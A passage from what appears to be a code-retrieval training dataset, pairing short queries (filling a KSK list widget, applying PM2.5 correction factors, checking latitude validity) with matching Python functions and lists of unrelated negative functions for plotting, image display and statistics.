"def show_image(self):\n if self.image_id:\n self.canvas.delete(self.image_id)\n\n width, height = self.image.size\n cw = self.canvas.winfo_width()\n ch = self.canvas.winfo_height()\n\n nw = int(width * self.scale_range[self.scale_idx])\n nh = int(height * self.scale_range[self.scale_idx])\n self.imagetk = ImageTk.PhotoImage(\n self.image.resize( (nw, nh), Image.ANTIALIAS )\n )\n\n ow = (cw - nw) / 2 if nw < cw else 0\n oh = (ch - nh) / 2 if nh < ch else 0\n\n self.image_id = self.canvas.create_image(ow , oh, image=self.imagetk, anchor='nw')\n self.canvas.configure(scrollregion=self.canvas.bbox('all'))",
"def show_img(self, size, depth): # mostra imagem a partir do algoritimo de\n imagem_branco = self.generate_baseimage(size)\n print(\"imagem_branco\")\n list_triangles = self.create_depths_from_triangle(self.get_triangle_from_square(square.create_from_size(size)),\n depth)\n print(\"lista gerada\")\n imagem = self.draw_all_triangles_from_list( imagem_branco, list_triangles)\n print(\"imagem pronta\")\n cv2.imshow(\"test\", imagem) # testing\n cv2.waitKey()",
"def plotCloudImage(self):\n from pImagePlots import PImagePlots\n import pylab\n im = PImagePlots()\n im.setImage(self.cloudimage)\n im.showImage(copy=True)\n im.hanningFilter()\n im.calcAll()\n im.showPsd2d()\n im.showAcovf2d()\n im.showAcovf1d()\n im.showSf(linear=True)\n #pylab.show()\n return",
"def generate_image(self) -> None:",
"def view_image(row, train_test):\n\n image_name, l, t, r, b, class_idx = row\n class_name = car_dict[class_idx]\n drawn_img = Image.open(\n Path(\"stanford_car\")\n / \"car_data\"\n / train_test\n / class_name\n / image_name\n )\n bbox = ImageDraw.Draw(drawn_img)\n bbox.rectangle([l, t, r, b], outline=\"red\", fill=None)\n drawn_img.show()",
"def plot_kernels(K_collection, K_extract, fname):\n\n\tfig, ax = plt.subplots(1, figsize=(10, 5))\n\tfor i in range(len(K_collection)):\n\t\tax.plot(K_collection[i], c=\"red\", lw=0.5) \n\tax.plot(K_extract, c=\"blue\", lw=1.5)\n\tax.set_ylim([-0.03, 0.3])\n\tax.axhline(y=0, c=\"black\", ls=\"--\", lw=1.)\n\tplt.savefig(fname, dpi=200, bbox_inches=\"tight\")\n# plt.show()\n\tplt.close()\n\n\treturn",
"def _display_iteration(self, X, nearest_idx):\n if self.vis_dims == 0:\n return\n\n points = X.copy()\n centroids = self.centroids.copy()\n\n data_components = points.shape[1]\n if data_components > self.vis_dims:\n pca = PCA(n_components=self.vis_dims)\n points = pca.fit_transform(points)\n centroids = pca.transform(centroids)\n\n f = plt.figure(figsize=(4, 4))\n plt.title(f'Clustering {self.name} data with K={self.K}')\n\n # Visualization for 3D\n if self.vis_dims == 3:\n ax = Axes3D(f)\n for k in range(self.K):\n # Plot centroid k\n ax.scatter(xs=centroids[k, 0],\n ys=centroids[k, 1],\n zs=centroids[k, 2],\n c=[self.colors[k]], s=150,\n marker='*', edgecolors='black', zorder=2)\n\n # Plot points associated with cluster k\n ax.scatter(xs=points[nearest_idx[k], 0],\n ys=points[nearest_idx[k], 1],\n zs=points[nearest_idx[k], 2],\n c=[self.colors[k]], s=10, alpha=0.5, zorder=1)\n\n # Visualization for 2D\n else:\n for k in range(self.K):\n # Plot centroid k\n plt.scatter(x=centroids[k, 0],\n y=centroids[k, 1],\n c=[self.colors[k]], s=150,\n marker='*', edgecolors='black', zorder=2)\n\n # Plot points associated with cluster k\n plt.scatter(x=points[nearest_idx[k], 0],\n y=points[nearest_idx[k], 1],\n c=[self.colors[k]], s=10, alpha=0.5, zorder=1)\n\n if self.fig_save_path is None:\n plt.show()\n else:\n directory = os.path.join(self.fig_save_path, self.__class__.__name__)\n if not os.path.exists(directory):\n os.mkdir(directory)\n plt.savefig(os.path.join(directory, f'{self.name}_K{self.K}_{self.it}.png'))\n plt.close()",
"def show_batch(dataLoader, rows):\n for images, labels in dataLoader:\n _, ax = plt.subplots(figsize=(12, 12))\n ax.set_xticks([])\n ax.set_yticks([])\n ax.imshow(make_grid(images[:64], nrow=rows).permute(1, 2, 0))\n print(labels)\n break",
"def show_image(img, label, indice=-1):\n\tif indice ==-1:\n\t\tindice = img.shape[1]//2\n\n\tN = label.shape[0]\n\tfig, ax = plt.subplots(1, N+1, figsize=(12, 4), sharey=True)\n\tax[0].imshow(img[0][indice], cmap='gray')\n\t# have to show the original image\n\n\tfor i in range(N):\n\t\tax[i+1].imshow(label[i][indice], cmap='gray')\n\tplt.show()\n\n\tpass",
"def visualizeQuakes(k, r):\r\n eq_dict = readeqf()\r\n centroids = createCentroids(k, eq_dict)\r\n clusters = createClusters(k, centroids, eq_dict, r)\r\n\r\n w = 1800 #Window width.\r\n h = 900 #Window height.\r\n bg_pic = \"better_worldmap1800_900.gif\"\r\n\r\n t.setup(width=w, height=h)\r\n t.bgpic(bg_pic)\r\n t.speed(\"fastest\")\r\n t.hideturtle()\r\n t.up()\r\n\r\n w_factor = ((w / 2) / 180)\r\n h_factor = ((h / 2) / 90)\r\n\r\n color_list = [\"dark red\", \"dark green\", \"dark blue\", \"dark orange\",\r\n \"dark orchid\", \"dark goldenrod\", \"dark violet\",\r\n \"pink\", \"magenta\", \"sky blue\", \"plum\", \"dark salmon\",\r\n \"goldenrod\", \"chartreuse\", \"dark sea green\", \"cornsilk\",\r\n \"dark olive green\", \"bisque\", \"blanched almond\",\r\n \"dark cyan\", \"royal blue\", \"papaya whip\", \"peach puff\",\r\n \"misty rose\", \"mint cream\", \"lavender blush\", \"hot pink\",\r\n \"dark khaki\", \"cornflower blue\", \"chocolate\"]\r\n\r\n for cluster_index in range(k):\r\n t.color(color_list[cluster_index])\r\n for akey in clusters[cluster_index]:\r\n lon = (eq_dict[akey][0]) * w_factor\r\n lat = (eq_dict[akey][1]) * h_factor\r\n t.goto(lon, lat)\r\n t.dot()\r\n return None",
"def drawKeypoints_Array(img0,pts):\n f,ax2 = plt.subplots(1, 1)\n cols = pts[:,0]\n rows = pts[:,1]\n ax2.imshow(cv2.cvtColor(img0, cv2.COLOR_BGR2RGB))\n ax2.scatter(cols, rows)\n plt.show()",
"def _plot_one_shelf(layout, shelf_length=48, shelf_height=10, scale=10, image_folder='/Users/matthew.mu/dat/images'):\n result = layout\n\n nl = len(result)\n\n # plot shelf\n im = Image.new('RGB', [shelf_length*scale, nl*shelf_height*scale], (211, 211, 211))\n draw = ImageDraw.Draw(im)\n\n for i in range(nl):\n draw.line((0, shelf_height*scale * i + shelf_height*scale, shelf_length*scale, shelf_height*scale * i + shelf_height*scale),\n fill=(0, 0, 0), width=2)\n\n # result to display\n colors = ['blue', 'green', 'red', 'yellow', 'black', 'brown']\n\n sku_list = list(set([item for sl in [result[i]['skus'] for i in range(len(result))] for item in sl]))\n sku_color_dict = dict({sku_list[i]: colors[i % len(colors)] for i in range(len(sku_list))})\n\n for layer in range(len(result)):\n\n result_layer = result[layer]\n n = result_layer['n']\n skus = result_layer['skus']\n x = result_layer['x']\n y = result_layer['y']\n for i in range(len(n)):\n if n[i] > 0 and y[i] - x[i] > 0:\n sku_length = (y[i] - x[i]) / n[i]\n try:\n pil_im = Image.open(os.path.join(image_folder, skus[i] + '.jpg'))\n except:\n pil_im = Image.new('RGB', (100, 200), (211, 211, 211))\n dr = ImageDraw.Draw(pil_im)\n dr.rectangle(((10, 10), (90, 190)), outline=sku_color_dict[skus[i]])\n dr.text((15, 15), f\"{skus[i]}\", fill=\"black\")\n\n prod_im = _trim(pil_im).resize((round(sku_length * scale), shelf_height*scale), Image.ANTIALIAS)\n x_ = x[i]\n for j in range(n[i]): # n[i] times\n im.paste(prod_im, (round(x_ * scale), shelf_height*scale * layer))\n x_ += sku_length\n\n return im",
"def show(self):\n fig, ax = plt.subplots(1, 1)\n image = ImageShower(ax, self.image)\n fig.canvas.mpl_connect('scroll_event', image.onscroll)\n plt.show()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Fill up the KSK list widget by KSK names
|
def fill_KSK_list_widget(self):
self.list_widget.clear()
search_query = self.search_box.text()
KSK_names, dates = search_for_KSK(search_query)
if self.cb.count() == 0:
self.cb.addItem('Filter by date')
self.cb.addItems({date for date in dates.keys()})
else:
self.cb.setCurrentIndex(0)
self.list_widget.addItems(KSK_names)
|
[
"def _populateEntries(self):\n\n widgets = self.setting.getWidgetList()\n\n # we only need the list of names\n names = list(widgets.keys())\n names.sort()\n\n utils.populateCombo(self, names)",
"def show_KSK_images(self, index: int = None):\r\n KSK_name = \"\"\r\n if type(index) == int and 0 <= index < self.list_widget.count():\r\n KSK_name = self.list_widget.item(index).text()\r\n self.list_widget.selectedItems().clear()\r\n self.list_widget.setCurrentRow(index)\r\n\r\n else:\r\n KSK_name = self.list_widget.selectedItems()[0].text()\r\n\r\n get_KSK(KSK_name)\r\n\r\n connectors_gb = self.createParentGroup(f\"Connectors Of {KSK_name}\")\r\n connectors_gb.setStyleSheet(\"font-size: 22px\")\r\n\r\n self.main_grid.addWidget(connectors_gb, 0, 2, 9, 4)\r\n\r\n next_btn = QPushButton(connectors_gb)\r\n next_btn.setGeometry(980, 290, 70, 40)\r\n MyIcon2 = QPixmap('input/images/next.png')\r\n next_btn.setIcon(QIcon(MyIcon2))\r\n next_btn.setIconSize(QSize(100, 40))\r\n next_btn.setToolTip('next')\r\n next_btn.setStyleSheet(\"background-color :#fbeec1;color:#fbeec1\")\r\n next_btn.clicked.connect(lambda: self.show_KSK_images(\r\n self.list_widget.selectedIndexes()[0].row() + 1))\r\n\r\n previous_btn = QPushButton(connectors_gb)\r\n previous_btn.setGeometry(20, 290, 70, 40)\r\n MyIcon = QPixmap('input/images/previous.png')\r\n previous_btn.setIcon(QIcon(MyIcon))\r\n previous_btn.setIconSize(QSize(100, 40))\r\n previous_btn.setToolTip('Previous')\r\n\r\n previous_btn.setStyleSheet(\"background-color :#fbeec1;color:#fbeec1\")\r\n previous_btn.clicked.connect(lambda: self.show_KSK_images(\r\n self.list_widget.selectedIndexes()[0].row() - 1))",
"def create_labels(self):\n for name in self.names:\n label_name = Label(text=name, id=name)\n self.root.ids.entries_box.add_widget(label_name)",
"def on_dnList_itemSelectionChanged(self):\n self.__updateDefineNameButtons()",
"def lista_listwidget(self):\n\n for item in self.lista:\n self.listwidget.addItem(item)",
"def add_songs_to_listbox(self):\r\n self.listbox.delete(0, END)\r\n for title in self.titles:\r\n self.listbox.insert(END, title)",
"def __init__(self, quickid=None, description=None, value=None,validator=None,list1=[],list2=[], name1=None, name2=None, hideon=None, selection=\"single\"):\n\t\n\tQuickWidget.__init__(self, quickid, description, value, validator, hideon=hideon)\n\n self.value = value or [[item, None] for item in list1]\n\tself.list1 = list1\n\tself.list2 = list2\n self.name1 = name1\n self.name2 = name2 \n self.selection = selection\n\n\tgtk.HBox.__init__(self, False, 0)\n\tself.type=\"ListPair\"\n\n self._createTables()\n\n\tself.pack_start(self.listL,False,5)\n\tself.pack_start(self.listR,False,5)\n\tself._create_entry()\n\tself._create_button()",
"def list_kernels():\n knames, ktypes = [], []\n for typ in [\"spk\", \"fk\", \"tk\", \"pck\", \"lsk\"]:\n for ii in range(spice.ktotal(typ)):\n dat = spice.kdata(ii, typ)\n knames.append(dat[0])\n ktypes.append(dat[1])\n return knames, ktypes",
"def create_labels(self):\n for name in self.names:\n temp_label = Label(text=name)\n self.root.ids.main.add_widget(temp_label)",
"def __populateDefineNamesList(self, definedNames):\n for definedName in definedNames:\n if definedName:\n nameValueList = definedName.split(\"=\")\n name = nameValueList[0].strip()\n if len(nameValueList) > 1:\n value = nameValueList[1].strip()\n else:\n value = \"\"\n QTreeWidgetItem(self.dnList, [name, value])\n \n self.dnList.sortItems(0, Qt.AscendingOrder)",
"def by_kinase_name(self, kinase_names):\n raise NotImplementedError(\"Implement in your subclass!\")",
"def items(self):\n return _NamelistItemsView(self)",
"def loadOfferings(self):\n if self.parent_widget.service and self.parent_widget.service.service_valid:\n self.removeOfferings() # clear current data\n self.contents = self.parent_widget.service.service.__dict__['contents']\n #print \"SOS:401 self.contents\", self.contents\n for content in self.contents:\n item = QtGui.QListWidgetItem(content.id)\n self.lbxOfferings.addItem(item)",
"def inhoud_listbox_aanpassen(lijst):\r\n\t\t\tlistbox_producten.delete(0, \"end\")\r\n\r\n\t\t\tmaximum_lengte_naam = 40\r\n\r\n\t\t\tfor product in lijst:\r\n\t\t\t\tlistbox_producten.insert(\"end\",\r\n\t\t\t\t\t\t\t\t\t\tf\" {product['name'][:maximum_lengte_naam]:{maximum_lengte_naam}}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"{product['release_date']:>16}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"{product['rating']:>29}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"{product['price']:>11.2f}\"\r\n\t\t\t\t\t\t\t\t\t\tf\"€\")",
"def setup_keywords_ui(self, parent, layout):\n keywords = self.names_config.get(\"keywords\", {})\n\n if keywords:\n cats_layout = QtWidgets.QHBoxLayout(parent)\n\n # create category and btn grid for all keywords\n cat_names = keywords.keys()\n for catName in cat_names:\n cat_keywords = keywords[catName]\n cat_layout = self.setupKeywordCategoryUi(parent, catName, cat_keywords)\n cats_layout.addLayout(cat_layout)\n\n layout.addLayout(cats_layout)\n\n else:\n no_names_label = QtWidgets.QLabel(parent)\n no_names_label.setText(\"no keywords\")\n no_names_label.setProperty(\"cssClasses\", \"help\")\n layout.addWidget(no_names_label)",
"def __init__(self, listwidget, lista):\n\n self.listwidget = listwidget # listWidget.\n self.lista = lista # Lista de python",
"def display_grp_words(self):\n index = self.list_grp.selectionModel().currentIndex()\n group_txt = index.sibling(index.row(), 0).data()\n self.list_wrd_in_grp.clear() # clears group words list (right list).\n for word in self.db.get_group_words(group_txt):\n self.list_wrd_in_grp.addItem(word[0])",
"def fillListctrlFromSQL(objListctrl, stSQL, keyCol=0, visibleCol=1):\n objListctrl.DeleteAllItems()\n recs = curD.execute(stSQL).fetchall()\n i=0 # dummy variable, will change with each InsertStringItem\n for rec in recs:\n objListctrl.InsertStringItem(i, rec[visibleCol])\n objListctrl.SetItemData(i, rec[keyCol])",
"def fillListctrlFromSQL(objListctrl, stSQL, keyCol=0, visibleCol=1):\n recs = curD.execute(stSQL).fetchall()\n i=0 # dummy variable, will change with each InsertStringItem\n for rec in recs:\n objListctrl.InsertStringItem(i, rec[visibleCol])\n objListctrl.SetItemData(i, rec[keyCol])"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Apply correction factors (in place) to PM2.5 data in data_list
|
def applyCorrectionFactorsToList(data_list, pm25_key=None):
# Open the file and get correction factors
with open(getenv("CORRECTION_FACTORS_FILENAME")) as csv_file:
read_csv = csv_reader(csv_file, delimiter=',')
rows = [row for row in read_csv]
header = rows[0]
rows = rows[1:]
correction_factors = []
for row in rows:
rowDict = {name: elem for elem, name in zip(row, header)}
rowDict['start_date'] = parseDatetimeString(rowDict['start_date'])
rowDict['end_date'] = parseDatetimeString(rowDict['end_date'])
rowDict['3003_slope'] = float(rowDict['3003_slope'])
rowDict['3003_intercept'] = float(rowDict['3003_intercept'])
correction_factors.append(rowDict)
# Apply the correction factors to the PM2.5 data
for datum in data_list:
try:
datum[pm25_key] = applyCorrectionFactor(correction_factors, datum['Timestamp'], datum[pm25_key])
except: # Only try once. We just assume it isn't there if the first row doesn't have it
return data_list
# found = False
# for factor in correction_factors:
# factor_start = factor['start_date']
# factor_end = factor['end_date']
# if factor_start <= datum['Timestamp'] < factor_end:
# datum['PM2_5'] = datum['PM2_5'] * factor['3003_slope'] + factor['3003_intercept']
# found = True
# break
# if not found:
# print('\nNo correction factor found for ', datum['Timestamp'])
return data_list
|
[
"def apply_correction(data):\r\n \r\n \r\n arduinos = data.keys()\r\n \r\n temp_correction = {1: 0.09, 2: 0.10, 3: -0.02, 4: -0.23, 5: -0.20,\r\n 6: 0.05, 7: 0.15, 8: 0.12, 9: -0.10, 10: 0.11,\r\n 11: 0.0}#-0.08}\r\n temp_bias = 0.4896611061095239\r\n \r\n humidity_correction = {1: -0.15, 2: 0.28, 3: -0.09, 4: 0.08, 5: 0.41,\r\n 6: -0.19, 7: -2.16, 8: 1.01, 9: -0.64, 10: -0.35,\r\n 11: 0.0}#2.01}\r\n humidity_bias = 2.7331455153884265\r\n \r\n pressure_correction = {1: -0.478, 2: 1.112, 3: -0.415, 4: -0.861, 5: -0.43,\r\n 6: -0.367, 7: -0.712, 8: -0.257, 9: 0.346, 10: -0.77,\r\n 11: 0.0}\r\n pressure_bias = 1.213813881674857\r\n \r\n for i in arduinos:\r\n # temperature\r\n data[i][1:, 1] = data[i][1:, 1] + temp_correction[i] - temp_bias\r\n # humidity\r\n data[i][1:, 2] = data[i][1:, 2] + humidity_correction[i] - humidity_bias\r\n print(\"Temperature and humidity calibrated\")\r\n\r\n if data[1][1, 0] > date2num(datetime.datetime(2018, 8, 31, 0, 0)):\r\n for i in arduinos:\r\n # pressure\r\n data[i][1:, 3] = data[i][1:, 3] + pressure_correction[i] -pressure_bias\r\n print(\"Pressure calibrated\")\r\n \r\n return data",
"def estimate_factors(self):\n self.apply_transforms()\n self.remove_outliers()\n if self.Nfactor is None:\n self.baing()\n self.factors_em()",
"def _apply_factors(params):\n\n params['Rs'] = params['Rs'] * R_sun\n params['Mp'] = params['Mp'] * M_jup\n params['Rp'] = params['Rp'] * R_jup\n\n return params",
"def scale_list(data, factor):\n assert factor != 0, 'ERROR: Zero-division encountered'\n return [item / factor for item in data]",
"def apply_weights_correction(data, correction):\n out = np.empty_like(data)\n for i in range(out.shape[0]):\n for j in range(out.shape[1]):\n for k in range(out.shape[2]):\n cc = correction[i, j, k]\n c = cc.real**2 + cc.imag**2\n if c > 0: # Will be false if c is NaN\n out[i, j, k] = data[i, j, k] / c\n else:\n out[i, j, k] = 0\n return out",
"def process_anneal(superdark_list, masterdark, mode): #LP added mode\n # LP added checks\n print('\\tReplacing pixels in superdarks with values from masterdark {}'.format(masterdark))\n print('\\tReplacing pixels in superdarks with values from masterdark {}'.format(masterdark))\n\n # Replace good pixels in superdarks\n for superdark in superdark_list:\n\n # Open the masterdark and the superdark\n masterdark_hdulist = fits.open(masterdark, mode='readonly')\n superdark_hdulist = fits.open(superdark, mode='update')\n\n # Find the non-good pixels in the superdark\n bad_pixels_ext3 = np.where(superdark_hdulist[3].data != 0)\n bad_pixels_ext6 = np.where(superdark_hdulist[6].data != 0)\n\n # Assume the new data takes the form of the masterdark\n new_data_ext1 = masterdark_hdulist[1].data.astype(np.float32)\n new_data_ext2 = masterdark_hdulist[2].data.astype(np.float32)\n new_data_ext4 = masterdark_hdulist[4].data.astype(np.float32)\n new_data_ext5 = masterdark_hdulist[5].data.astype(np.float32)\n\n # For non-good pixels, replace the values with that of the superdark\n new_data_ext1[bad_pixels_ext3] = superdark_hdulist[1].data[bad_pixels_ext3].astype(np.float32)\n new_data_ext2[bad_pixels_ext3] = superdark_hdulist[2].data[bad_pixels_ext3].astype(np.float32)\n new_data_ext4[bad_pixels_ext6] = superdark_hdulist[4].data[bad_pixels_ext6].astype(np.float32)\n new_data_ext5[bad_pixels_ext6] = superdark_hdulist[5].data[bad_pixels_ext6].astype(np.float32)\n superdark_hdulist[1].data = new_data_ext1\n superdark_hdulist[2].data = new_data_ext2\n superdark_hdulist[4].data = new_data_ext4\n superdark_hdulist[5].data = new_data_ext5\n\n # Save the changes\n superdark_hdulist.close()",
"def correct_pvalues_for_multiple_testing(pvalues, correction_type = \"Benjamini-Hochberg\"):\n pvalues = np.array(pvalues) \n n = float(pvalues.shape[0]) \n qvalues = np.empty(pvalues.shape[0])\n if correction_type == \"Bonferroni\": \n qvalues = n * pvalues\n elif correction_type == \"Bonferroni-Holm\": \n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ] \n values.sort()\n for rank, vals in enumerate(values): \n pvalue, i = vals\n qvalues[i] = (n-rank) * pvalue \n elif correction_type == \"Benjamini-Hochberg\": \n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ] \n values.sort()\n values.reverse() \n new_values = []\n for i, vals in enumerate(values): \n rank = n - i\n pvalue, index = vals \n new_values.append((n/rank) * pvalue) \n for i in range(0, int(n)-1): \n if new_values[i] < new_values[i+1]: \n new_values[i+1] = new_values[i] \n for i, vals in enumerate(values):\n pvalue, index = vals\n qvalues[index] = new_values[i] \n return qvalues.tolist()",
"def correct_pvalues_for_multiple_testing(pvalues, correction_type=\"Benjamini-Hochberg\"):\n\n pvalues = array(pvalues)\n n = float(pvalues.shape[0])\n new_pvalues = empty(n)\n if correction_type == \"Bonferroni\":\n new_pvalues = n * pvalues\n elif correction_type == \"Bonferroni-Holm\":\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n for rank, vals in enumerate(values):\n pvalue, i = vals\n new_pvalues[i] = (n - rank) * pvalue\n elif correction_type == \"Benjamini-Hochberg\":\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n values.reverse()\n new_values = []\n for i, vals in enumerate(values):\n rank = n - i\n pvalue, index = vals\n new_values.append((n / rank) * pvalue)\n for i in range(0, int(n) - 1):\n if new_values[i] < new_values[i + 1]:\n new_values[i + 1] = new_values[i]\n for i, vals in enumerate(values):\n pvalue, index = vals\n new_pvalues[index] = new_values[i]\n return new_pvalues",
"def correct_pvalues_for_multiple_testing(pvalues, correction_type=\"Benjamini-Hochberg\"):\r\n from numpy import array, empty\r\n pvalues = array(pvalues)\r\n n = pvalues.shape[0]\r\n new_pvalues = empty(n)\r\n if correction_type == \"Bonferroni\":\r\n new_pvalues = n * pvalues\r\n elif correction_type == \"Bonferroni-Holm\":\r\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\r\n values.sort()\r\n for rank, vals in enumerate(values):\r\n pvalue, i = vals\r\n new_pvalues[i] = (n-rank) * pvalue\r\n elif correction_type == \"Benjamini-Hochberg\":\r\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\r\n values.sort()\r\n values.reverse()\r\n new_values = []\r\n for i, vals in enumerate(values):\r\n rank = n - i\r\n pvalue, index = vals\r\n new_values.append((n/rank) * pvalue)\r\n for i in range(0, int(n)-1):\r\n if new_values[i] < new_values[i+1]:\r\n new_values[i+1] = new_values[i]\r\n for i, vals in enumerate(values):\r\n pvalue, index = vals\r\n new_pvalues[index] = new_values[i]\r\n return new_pvalues",
"def inference(factorList, queryVariables, orderedListOfHiddenVariables, evidenceList):\n \"\"\" This function should restrict the factors in factorList according to the evidence in evidenceList.\n Next, it should sumout the hidden variables from the product of the factors in factorList. \n The variables should be summed out in the order given in orderedListOfHiddenVariables. \n Finally, the answer should be normalized when a probability distribution that sums up to 1 is desired. \"\"\"\n for evidence in evidenceList:\n for idx, factor in enumerate(factorList):\n shapeLst = list(factor.shape)\n if shapeLst[evidence['var']] == 2:\n res = restrict(factor, evidence['var'], evidence['value'])\n factorList[idx] = res\n #print 'Restriction Complete: ' + str(evidence['var'])\n #print factorList\n \n for hidVarIdx, hidVar in enumerate(orderedListOfHiddenVariables):\n factorLstToMultiply = []\n factorLstIndexLst = []\n \n for idx, factor in enumerate(factorList):\n shapeLst = list(factor.shape)\n if shapeLst[hidVar] == 2:\n factorLstToMultiply.append(factor)\n factorLstIndexLst.append(idx)\n \n factorLstIndexLst.sort(reverse=True)\n \n for factorLstIndex in factorLstIndexLst:\n factorList.pop(factorLstIndex)\n \n #print 'factor List'\n #print factorList\n \n if len(factorLstToMultiply) != 0:\n sum = factorLstToMultiply.pop()\n for idx, factor in enumerate(factorLstToMultiply):\n sum = multiply(sum, factor)\n sum = sumout (sum, hidVar)\n #print 'multiply + sum-out var ' + str(hidVar)\n #print sum\n factorList.append(sum)\n \n #print 'debug'\n #print factorList\n \n # The remaining factors refer only to the query variables Q, take their product and normalize to produce P(Q)\n sum = factorList.pop()\n for idx, factor in enumerate(factorList):\n sum = multiply(sum, factor)\n \n return normalize(sum)",
"def call_pls(chrom,xdata,factors,mask,data):\n scores = []\n \n for i in range(chrom.shape[0]):\n if _remdup(chrom[i]) == 0:\n #extract vars from xdata\n slice = scipy.take(xdata,chrom[i,:].tolist(),1)\n collate = 0\n for nF in range(mask.shape[1]):\n #split in to training and test\n try:\n pls_output = pls(slice,data['class'][:,0][:,nA],mask[:,nF].tolist(),factors)\n \n if min(pls_output['rmsec']) <= min(pls_output['rmsepc']):\n collate += pls_output['RMSEPC']\n else:\n collate += 10.0**5\n except:\n collate = 0\n \n if collate != 0:\n scores.append(collate/float(mask.shape[1]))\n else:\n scores.append(10.0**5)\n else:\n scores.append(10.0**5)\n \n return scipy.asarray(scores)[:,nA]",
"def learn_from_maps(self, data):\n # Remove any map with only zero values:\n self.maps_ = self.maps_[self.maps_.ptp(axis=1) != 0]\n if not len(self.maps_):\n # All maps are zero\n self.cov_ = np.array([[]], dtype=np.float)\n return\n # Flip sign to always have positive features\n for map in self.maps_:\n mask = map > 0\n if map[mask].sum() > - map[np.logical_not(mask)].sum():\n map *= -1\n\n # Relearn U, V to have the right scaling on U\n residuals = None\n #residuals = 0\n U = list()\n for d in data:\n u, this_residuals = self.learn_time_series(d)\n U.append(u)\n #this_residuals = np.sqrt(np.mean(this_residuals))\n #residuals += this_residuals\n if residuals is None:\n residuals = this_residuals\n else:\n residuals += this_residuals\n residuals /= len(data)\n #self.residuals_ = np.atleast_1d(residuals)\n self.residuals_ = residuals # = np.sqrt(residuals)\n self.residuals_.fill(np.sqrt(self.residuals_.mean()))\n del this_residuals, u, d\n U = np.concatenate(U, axis=1)\n n_samples = U.shape[1]\n S = np.sqrt((U ** 2).sum(axis=1) / n_samples)\n U /= S[:, np.newaxis]\n self.maps_ *= S[:, np.newaxis]\n self.cov_ = 1. / n_samples * np.dot(U, U.T)\n #self.cov_ = np.eye(n_maps)",
"def add_factors(factors): \n global p_factors\n for (d,c) in factors:\n add(d,c)",
"def setFactors(self, number):\n self.number = number\n length = len(self.primes)\n p = self.primes[:self.closestPrimeIndex(self.primes, self.number**0.5) + 1]\n\n self.facts = cuda_factor(self.number, p)\n\n c = 1\n for fact in self.facts:\n c = c * fact\n\n if c != self.number:\n num = self.number / c\n for fact in self.facts:\n while num % fact == 0:\n num = num / fact\n\n if num != 1:\n self.facts.append(num)",
"def correct_data(forecast):\n for key, meta in vs.metvars.items():\n for suffix in ['_mean', '_lower_percentile', '_upper_percentile']:\n key_suffix = f'{key}{suffix}'\n if meta['correction'] == 'ratio':\n forecast.loc[~forecast[f'bias_{key}_mean'].isna(), key_suffix] /= forecast.loc[~forecast[f'bias_{key}_mean'].isna(), f'bias_{key}_mean']\n elif meta['correction'] == 'difference':\n forecast.loc[~forecast[f'bias_{key}_mean'].isna(), key_suffix] -= forecast.loc[~forecast[f'bias_{key}_mean'].isna(), f'bias_{key}_mean']\n forecast[key_suffix] = forecast[key_suffix].round(1)",
"def call_dfa(chrom,xdata,DFs,mask,data):\n Y = []\n for x in range(len(chrom)):\n if _remdup(chrom[x]) == 0:\n #extract vars from xdata\n slice = meancent(_slice(xdata,chrom[x]))\n collate = 0\n for nF in range(mask.shape[1]):\n #split in to training and test\n tr_slice,cv_slice,ts_slice,tr_grp,cv_grp,ts_grp,tr_nm,cv_nm,ts_nm=_split(slice,\n data['class'][:,0],mask[:,nF].tolist(),data['label'])\n \n try:\n u,v,eigs,dummy = cva(tr_slice,tr_grp,DFs)\n projU = scipy.dot(cv_slice,v)\n u = scipy.concatenate((u,projU),0)\n group2 = scipy.concatenate((tr_grp,cv_grp),0)\n \n B,W = _BW(u,group2)\n L,A = scipy.linalg.eig(B,W)\n order = _flip(scipy.argsort(scipy.reshape(L.real,(len(L),))))\n Ls = _flip(scipy.sort(L.real))\n eigval = Ls[0:DFs]\n \n collate += sum(eigval)\n except:\n continue\n \n if collate != 0:\n Y.append(float(mask.shape[1])/collate)\n else:\n Y.append(10.0**5)\n else:\n Y.append(10.0**5)\n \n return scipy.array(Y)[:,nA]",
"def update(self, data):\n for hypo in self.values():\n like = self.likelihood(data, hypo)\n self.mult(hypo, like)\n\n return self.normalize()",
"def normalize_data(self, data, scale_factor, norm_factors):\n norm_data = []\n # set to 1 for NewOrder transactions\n data['neworder_count'] = np.where(data['transactiontype']\n == self.NEW_ORDER_ID, 1, 0)\n # cumulative sum of NewOrder transactions\n data['neworder_cum_sum'] = data['neworder_count'].cumsum()\n\n norm_vector = pd.Series(norm_factors,\n index=range(self.OLAP_QUERY_LOWER_ID,\n self.OLAP_QUERY_HIGHER_ID + 1),\n name=\"normfactors\")\n\n norm_data = data.join(norm_vector, \"transactiontype\")\n norm_data['normfactors'].fillna(0, inplace=True)\n norm_data['norm_latency'] = norm_data['latency'] / \\\n (scale_factor + norm_data['normfactors'] *\n norm_data['neworder_cum_sum'])\n return norm_data",
"def map_EM_2_LDC(EM_list, mapping_rule, threshold=-1):\n counter = {}\n for em in EM_list: # each EMTerm\n mapped_dict = mapping_rule[em]\n for ldc, weight in mapped_dict.items(): # each ldc label corr. EMTerm\n if ldc not in counter:\n counter[ldc] = weight\n else:\n counter[ldc] += weight\n\n if threshold == -1:\n counter = list(counter.items())\n counter.sort(key=lambda x: x[1], reverse=True)\n return counter\n else:\n ret = []\n for ldc, cnt in counter.items():\n if cnt >= threshold:\n ret.append(ldc)\n return ret"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Check if latitude is valid
|
def verifyLatitude(lat:float) -> bool:
return (-90 <= lat <= 90)
|
[
"def check_latitude(lat):\n if lat < -90 or lat > 90:\n raise ValueError(\"Latitude (%f) out of range [-90 - 90]\" % lat)",
